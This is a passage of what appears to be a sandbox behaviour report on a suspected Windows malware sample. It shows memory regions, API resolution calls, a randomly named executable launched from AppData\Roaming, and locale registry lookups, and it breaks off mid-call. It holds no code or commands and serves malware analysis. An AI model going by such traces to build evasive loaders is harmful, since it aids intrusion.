0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 33558 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34054 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 34055 start_va = 0x4ab60000 end_va = 0x4ab6ffff entry_point = 0x4ab60000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34092 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34093 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34094 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34095 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34096 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34097 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34098 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34099 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34100 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34101 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34333 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 34334 start_va = 0x4a3f0000 end_va = 0x4a3fffff entry_point = 0x4a3f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34335 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34336 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34337 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34338 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34339 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34340 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34341 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34342 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34343 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34344 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34946 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 34947 start_va = 0x4a280000 end_va = 0x4a28ffff entry_point = 0x4a280000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34948 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34949 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34950 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34951 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34952 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34953 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34954 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34955 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34956 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 34957 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Thread: id = 9 os_tid = 0xaf0 [0093.915] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0093.916] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0093.917] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0093.918] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0093.919] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.920] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.920] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0093.920] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0093.921] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0093.931] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.932] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0093.932] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0093.933] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0093.933] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0093.933] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0093.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0093.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0093.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0093.933] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0093.934] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0093.934] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0093.934] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0093.934] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0093.934] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0093.934] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0093.934] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0093.935] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0093.935] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0093.935] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0093.935] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0093.935] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0093.935] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0093.935] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0093.935] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0093.935] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0093.936] SetThreadLocale (Locale=0x400) returned 1 [0093.936] GetVersion () returned 0x1db10106 [0093.936] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.936] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0093.936] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.936] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0093.936] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.936] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0093.936] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0093.937] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.937] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0093.937] GetACP () returned 0x4e4 [0093.937] GetCurrentThreadId () returned 0xaf0 [0093.937] GetVersion () returned 0x1db10106 [0093.937] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x1b1c18, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.937] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.937] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.937] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1230000 [0093.937] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.937] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.937] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: 